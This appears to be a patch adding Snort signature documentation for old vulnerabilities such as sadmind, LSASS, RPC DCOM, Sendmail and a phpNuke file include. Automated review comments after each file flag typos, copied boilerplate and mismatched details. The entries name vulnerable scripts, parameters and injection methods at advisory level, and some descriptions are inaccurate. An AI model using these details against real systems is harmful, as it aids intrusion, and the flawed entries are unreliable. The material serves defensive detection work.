+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
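Review bot: this file is word-for-word the same text as 1194.txt earlier in the patch, including the typo "running ona web server" and the missing possessive in "the attackers choosing"; nothing in it identifies which CGI script SID 1654 matches, and Additional References is empty. Suggest fixing the typos and naming the script in the Summary so the two files are distinguishable.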
--- /dev/null
+++ b/doc/signatures/1911.txt
@@ -0,0 +1,65 @@
+Rule:
+
+--
+Sid:
+1911
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer
+overflow associated with the Remote Procedure Call (RPC) sadmind.
+
+--
+Impact:
+Remote root access. This attack may permit execution of arbitrary
+commands with the privileges of root.
+
+--
+Detailed Information:
+The sadmind RPC service is used by Solaris Solstice AdminSuite
+applications to perform remote distributed system administration tasks
+such as adding new users. A buffer overflow associated with the
+NETMGT_PROC_SERVICE request of sadmind exists because of improper bounds
+checking. This may permit execution of arbitrary commands with the
+privileges of root.
+
+--
+Affected Systems:
+	Sun Solaris 2.5, 2.5.1, 2.6, 7.0
+
+--
+Attack Scenarios:
+Exploit code can be used to attack a vulnerable sadmind to obtain root
+access to the remote host.
+
+--
+Ease of Attack:
+Simple. Exploit scripts are freely available. 
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to
+RPC-enabled machines.
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+--
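Review bot: Corrective Action omits patching. Unlike the other files in this patch it lists only "Limit remote access to RPC services", firewall filtering and "Disable unneeded RPC services", with no "Apply the appropriate vendor supplied patches" line, even though Affected Systems names specific Solaris releases. Additional References is empty for a well-documented sadmind overflow; suggest adding the vendor advisory. Minor: "None Known." should match the lowercase "None known." used elsewhere, and "freely available. " carries trailing whitespace.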
--- /dev/null
+++ b/doc/signatures/2524.txt
@@ -0,0 +1,68 @@
+Rule:
+
+--
+Sid:
+2524
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer
+overrun condition in Microsoft products via the Local Security Authority
+Subsystem Service (LSASS).
+
+--
+Impact:
+Remote execution of arbitrary code.
+
+--
+Detailed Information:
+A vulnerability exists in LSASS that may present an attacker with the
+opportunity to execute code of their choosing on an affected host.
+
+The problem lies in an unchecked buffer in the LSASS service, suscessful
+exploitation may present the attacker with the opportunity to gain
+control of the affected system.
+
+--
+Affected Systems:
+	Microsoft Windows 2000, 2003 and XP systems.
+
+--
+Attack Scenarios:
+An attcker needs to make a specially crafted request to the LSASS
+service that could contain harmful code to gain further access to the
+system.
+
+--
+Ease of Attack:
+Moderate.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Use a packet filtering firewall to deny access to TCP and UDP ports 135
+and 445, UDP ports 137 and 138 and TCP ports 139 and 593 from resources
+outside the protected network.
+
+Access should also be denied to ephemeral ports and any other ports used
+by RPC services from sources external to the protected network.
+
+--
+Contributors:
+Sourcefire Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
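Review bot: the second Detailed Information paragraph is a comma splice with a typo: "an unchecked buffer in the LSASS service, suscessful exploitation may present" should be split into two sentences and read "successful". Also "An attcker" in Attack Scenarios should be "An attacker", "Apply the appropriate vendor supplied patches" lacks a period, and Additional References is empty although the Summary calls this a buffer overrun in Microsoft products.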
--- /dev/null
+++ b/doc/signatures/334.txt
@@ -0,0 +1,64 @@
+Rule:   
+
+--
+Sid: 334
+
+-- 
+Summary: 
+This event is generated when an attempt to copy a specific file to an FTP server is made.
+
+-- 
+
+Impact: 
+Serious. The attacker might gain the ability to execute commands remotely with the privileges of the affected user.
+
+--
+Detailed Information:
+This event is generated when an attempt to copy a ".forward" file to a victim host is made. A ".forward"file is used to configure email forwarding on UNIX systems. Usually it contains the email addresses where incoming email is forwarded. However, ".forward" file can also be used to forward email to programs (for example, "|IFS=' ' && exec /usr/bin/procmail -f- || exit 75 anton") and thus cause program execution triggered by arriving email messages. 
+
+This functionality can be used to activate a backdoor or start a daemon that listens for connections on a high port, launch a terminal session on the attacker's machine or initiate a reverse shell session. 
+
+This attack requires an established FTP session.
+
+--
+
+Attack Scenarios: 
+The attacker uploads a ".forward" file with commands to launch an "xterm" window on his machine into the user's home directory. Then he sends an email to the user whose ".forward" file was modified. That triggers the command in ".forward" and causes the xterm windows to be opened, providing shell access to a system with the privileges assigned to that user.
+
+-- 
+
+Ease of Attack: 
+The attack requires an access to a users home directory via FTP. This means that anonymous FTP access cannot be used for such an attack and a valid username and password is required. Additionally, the ability to upload files via FTP is required for a successful attack.
+
+-- 
+
+False Positives: 
+If the string ".forward"  is contained within the filename that is being uploaded to a server or within other FTP client responses, the rule will generate an event.
+
+--
+False Negatives: 
+None Known
+
+-- 
+
+Corrective Action: 
+Locate the uploaded ".forward" file and check it for signs of suspicious entries. 
+
+Check the server logs for other suspicious events that might have occurred within the same FTP session
+
+Disallow uploading of files via FTP and use Secure Shell (SSH) for transferring files by users.
+
+--
+Contributors: 
+Original rule writer Max Vision <vision@whitehats.com>
+Snort documentation contributed by Anton Chuvakin <http://www.chuvakin.org>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS319
+
+--
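Review bot: this file deviates from the template used by the rest of the patch: "Sid: 334" puts the number on the heading line (every other file puts it on its own line), the "Affected Systems:" section is missing entirely, and several "--" separators are followed by an extra blank line before the heading ("Impact:", "Attack Scenarios:", "Ease of Attack:", "False Positives:", "Corrective Action:"). In the text, 'A ".forward"file' is missing a space, "an access to a users home directory" should be "access to a user's home directory", and "Check the server logs for other suspicious events that might have occurred within the same FTP session" lacks a period. The Attack Scenarios paragraph refers to the attacker as "his" and "he" where the other files use "their".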
--- /dev/null
+++ b/doc/signatures/100000367.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000367
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "phpNuke" application running on a webserver. Access to the file "admin_board.php" using a remote file being passed as the "phpbb_root_path" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "phpbb_root_path" parameter in the "admin_board.php" script used by the "phpNuke" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using phpNuke
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
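Review bot: same template problems as 100000846.txt: the file opens with two blank lines and ends with a stray blank line after the final "--". "an exploitation attempt has been attempted" is redundant (suggest "has been made"), "running ona web server" should be "on a web server", and the third Detailed Information paragraph plus the Attack Scenarios paragraph describe credential checks on a CGI authentication mechanism, which does not relate to the remote file include via "phpbb_root_path" in "admin_board.php" that this rule detects. Additional References is empty.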
--- /dev/null
+++ b/doc/signatures/2761.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2761
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure define_priority_group
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
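Review bot: same broken sentence as 2747.txt: "vulnerability in the procedure define_priority_group" is followed by a line beginning ". This procedure is included in" and then "dbms_repcat." on its own line. Suggest "vulnerability in the procedure define_priority_group. This procedure is included in dbms_repcat." Also "Oracle Oracle9i" repeats the vendor name, "None Known" should be "None known.", "Apply the appropriate vendor supplied patch" lacks a period, and Additional References is empty.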
--- /dev/null
+++ b/doc/signatures/3378.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3378
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
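Review bot: Attack Scenarios contradicts Detailed Information in the same way as the RPC DCOM file at the top of this patch: "A malformed request to an RPC port" is the trigger described, yet the scenario given is "a request for a file with an overly long filename via a network share", which is a file-share overflow rather than DCOM. Suggest rewriting the scenario around a malformed DCOM request. Fix "Expoit code exists" under Ease of Attack, and fill in Additional References, which is empty.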
--- /dev/null
+++ b/doc/signatures/664.txt
@@ -0,0 +1,59 @@
+Rule:
+
+--
+Sid:
+664
+
+--
+Summary:
+This event is generated when maliciously formatted "rcpt to" text is supplied to Sendmail.
+
+--
+Impact:
+Attempted administrator access.  A successful attack can allow remote execution of commands with root privleges.
+
+--
+Detailed Information:
+A vulnerability exists in older versions of Sendmail that incorrectly parses message headers.  This can allow a malicious user to execute arbitrary commands as root.
+
+--
+Affected Systems:
+Sendmail versions prior to 8.6.10 and any version based on 5.x.
+
+--
+Attack Scenarios:
+An attacker can craft a malicious mail header that executes a command.
+
+--
+Ease of Attack:
+Easy.  Use a maliciously formatted header.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Upgrade to version 8.6.10 or higher of Sendmail.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/2308
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0203
+
+
+--
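Review bot: the Summary and the rest of the file disagree on what is matched. Summary says maliciously formatted '"rcpt to" text', but Detailed Information says Sendmail "incorrectly parses message headers" and Attack Scenarios says "a malicious mail header". RCPT TO is an SMTP envelope command, not a message header, so one of these needs correcting to match what the rule inspects. Also "root privleges" should be "root privileges", "Attempted administrator access.  A successful" and "Easy.  Use" use double spaces, and there is an extra blank line before the final "--".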
--- /dev/null
+++ b/doc/signatures/1769.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1769
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
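Review bot: this file is identical to 1291.txt and gives no indication of what SID 1769 matches; Summary and Detailed Information are generic ("the attack scenarios are legion") and Additional References is empty. Suggest naming the URI or resource the rule looks for and adding a reference. Minor: "the attackers choosing" under Impact should be "the attacker's choosing".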
--- /dev/null
+++ b/doc/signatures/314.txt
@@ -0,0 +1,61 @@
+Rule:
+--
+Sid:
+303
+
+--
+Summary:
+This event is generated when a specific inverse query is performed against your DNS server as a precursor to a possible TSIG (transaction signature) buffer overflow attack. 
+
+--
+Impact:
+Intelligence gathering.  This event generates as a result of an inverse query of the DNS server in an attempt to gain access to information required for the TSIG exploit.  An attacker will usually attempt a buffer overflow exploit if there is a response to the inverse query.
+
+--
+Detailed Information:
+This is an attempt to perform a specific DNS inverse query against your DNS server.  While this specific action is not harmful itself, it signals a precusor to a possible buffer overflow attack for a TSIG vulernability.  The inverse query is performed as a reconnaissance for the TSIG attack. 
+
+--
+Affected Systems:
+BIND Versions 4 and Versions 8 through 8.2 are susceptible to the inverse query information leak.
+
+--
+Attack Scenarios:
+If a DNS server responds to the inverse query and leaks information required for the actual attack, the attacker exploitsthe TSIG buffer overflow vulnerability.  If this is successful, the attacker gains access to the DNS server at the privilege of the "named" daemon.
+
+--
+Ease of Attack:
+Easy. Code is available to exploit the vulnerability.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+An attacker could change the exploit code.  For instance, an attacker could change the DNS identification number in the code to be something other than 0xABCD and the rule would not fire.
+
+--
+Corrective Action:
+Update to BIND versions greater than 8.2 to prevent the information leak.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/2302
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0010
+
+Arachnids:
+http://www.whitehats.com/info/IDS482
+
+
+--
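Review bot: the Sid in this file does not match its filename: the file is doc/signatures/314.txt but the Sid section says "303". One of the two is wrong and will send anyone looking up the event to the wrong documentation. Also the blank line between "Rule:" and the first "--" is missing (every other file has it), and there are typos: "precusor" and "vulernability" in Detailed Information, "exploitsthe" in Attack Scenarios. Corrective Action "Update to BIND versions greater than 8.2" addresses the "8 through 8.2" range but says nothing about BIND 4, which Affected Systems also lists; suggest adding guidance for BIND 4 installations.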
--- /dev/null
+++ b/doc/signatures/3351.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3351
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
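Review bot: third copy of the RPC DCOM text in this patch, with the same mismatch: Detailed Information attributes the overflow to "A malformed request to an RPC port" while Attack Scenarios describes "a request for a file with an overly long filename via a network share". Suggest one corrected scenario shared by 3351, 3378 and the first file, fixing "Expoit code exists" and filling Additional References at the same time.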
--- /dev/null
+++ b/doc/signatures/1302.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1302
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
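Review bot: this file repeats the 1291.txt boilerplate verbatim, so nothing distinguishes SID 1302 from 1291, 1769 or 1102 in this patch; the Summary should name the URI or resource the rule matches, and Additional References should not be empty for "a known vulnerability". Minor: "the attackers choosing" under Impact should be "the attacker's choosing".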
--- /dev/null
+++ b/doc/signatures/1102.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1102
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
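Review bot: for SID 1102 neither the Summary, Detailed Information nor Affected Systems ("All systems using a web server.") says which request or which vulnerability the rule matches, so "False Positives: None known." cannot be verified and the empty Additional References block gives the reader nothing to check against. State the matched content and the affected product, and cite the advisory the rule was written from.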
--- /dev/null
+++ b/doc/signatures/2974.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+2974
+
+--
+Summary:
+This event is generated when an attempt is made to gain access to
+private resources using Samba.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to use Samba to gain
+access to private or administrative shares on a host.
+
+--
+Affected Systems:
+	All systems using Samba for file sharing.
+	All systems using file and print sharing for Windows.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+direct access to Windows adminsitrative shares.
+
+--
+Ease of Attack:
+Simple. Exploit software is not required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
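Review bot: "direct access to Windows adminsitrative shares" in Attack Scenarios has a typo ("administrative"). The text also never says which SMB request or share name this rule keys on, only that it concerns "private or administrative shares"; a sentence in Detailed Information naming the share or operation matched would let operators tell this SID apart from the other Samba rules and assess the "None known" false positive claim.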
--- /dev/null
+++ b/doc/signatures/2347.txt
@@ -0,0 +1,58 @@
+Rule:
+
+--
+Sid:
+2347
+
+--
+Summary:
+This event is generated when an attempt is made to access the
+partner.php script which contains known vulnerabilities and
+is part of  the myPHPNuke web application running on a server.
+
+--
+Impact:
+Information gathering and possible cross site scripting attack.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in the myPHPNuke web application running on a server.
+Multiple vulnerabilities exist in the application which can lead to
+cross site scripting attacks.
+
+--
+Affected Systems:
+	myPHPNuke 1.8.8
+
+--
+Attack Scenarios:
+An attacker can supply code of their choice by including it in the
+Default_Theme parameter of the partner.php script.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
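Review bot: Additional References is empty although the Summary names a specific script ("partner.php"), Attack Scenarios names the parameter ("Default_Theme") and Affected Systems gives one version (myPHPNuke 1.8.8); cite the advisory for that issue. Since Detailed Information says "Multiple vulnerabilities exist in the application", also say which one this SID covers. Minor: "is part of  the myPHPNuke" in the Summary has a double space.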
--- /dev/null
+++ b/doc/signatures/2231.txt
@@ -0,0 +1,64 @@
+Rule:  
+
+--
+Sid:
+2231
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer 
+overflow in Trend Micro InterScan eManager.
+
+--
+Impact:
+Serious. Remote administrative access is possible.
+
+--
+Detailed Information:
+Versions of Trend Micro InterScan eManager suffer from a buffer overflow
+condition that can present an attacker with the opportunity to execute 
+arbitrary code of their choosing which could lead to remote access to 
+the server.
+
+--
+Affected Systems:
+	Trend Micro InterScan eManager 3.51
+
+--
+Attack Scenarios:
+If the buffer overflow condition is met, the attacker can run code of 
+their choosing on the affected host.
+
+--
+Ease of Attack:
+Moderate.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Disable the web interface
+
+Enable NTLM authentication for the administrative interface
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/3327
+
+--
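Review bot: the three Corrective Action items are punctuated inconsistently: "Upgrade to the latest non-affected version of the software." ends with a period while "Disable the web interface" and "Enable NTLM authentication for the administrative interface" do not. "Ease of Attack: Moderate." gives no reason while Impact says "Remote administrative access is possible"; one clause explaining the rating would help. Also the "-- " separator before Additional References carries trailing whitespace unlike the other separators in the file.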
--- /dev/null
+++ b/doc/signatures/2275.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+Sid:
+2275
+
+--
+Summary:
+This event is generated when an attempt is made to gain access to an
+SMTP server using brute force methods.
+
+--
+Impact:
+Attempted remote access.  
+This event may indicate that an attacker is attempting to guess username and password combinations.  
+Alternately, it may indicate that an authorized user has entered an
+incorrect username and password combination a number of times.
+
+--
+Detailed Information:
+An SMTP server will issue an error message after a failed login attempt.  
+This may be an indication of an attacker attempting brute force guessing 
+of username and password combinations.  It is also possible that an authorized 
+user has incorrectly entered a legitimate username and password combination.  
+
+This event will be generated after a number of failed attempts.
+
+--
+Affected Systems:
+SMTP servers.
+
+--
+Attack Scenarios:
+An attacker may attempt to guess username and password combinations.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+This event may be triggered by a failed SMTP login attempt from a remote user.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
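Review bot: the Corrective Action section is blank. Since Detailed Information says the event fires "after a number of failed attempts" and False Positives already allows for a legitimate user mistyping a password, suggest text along the lines of: check the SMTP server's authentication log for the source address, confirm whether the attempts belong to a known user, and enforce rate limiting or account lockout on SMTP authentication. Minor: "Ease of Attack: Simple" lacks the terminating period used elsewhere, and the Impact and Detailed Information lines carry trailing whitespace.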
--- /dev/null
+++ b/doc/signatures/100000114.txt
@@ -0,0 +1,64 @@
+Rule: 
+
+--
+Sid: 
+100000114
+
+-- 
+Summary: 
+This event is generated when an attacker attempts to execute arbitrary commands 
+on a system running the HappyMall E-Commerce suite.
+
+-- 
+
+Impact: 
+Attackers may run arbitrary commands of their choosing with the permissions of 
+the affected script.
+
+--
+Detailed Information:
+By specifying a value for the "file" parameter of the "normal_html.cgi" script 
+that is enclosed by any combination of pipe or semicolon characters, attackers 
+may execute arbitrary commands on the host system with the privileges of the 
+affected script.
+
+--
+Affected Systems:
+HappyCGI HappyMall 4.3
+HappyCGI HappyMall 4.4
+
+--
+
+Attack Scenarios: 
+This vulnerability may be exploited using a web browser, or an automated script.
+
+-- 
+
+Ease of Attack: 
+Simple, as a web browser or publicly available exploits may be used.
+
+-- 
+
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+-- 
+
+Corrective Action: 
+An unconfirmed patch is available at the URI listed in the Additional 
+References section.
+
+--
+Contributors: 
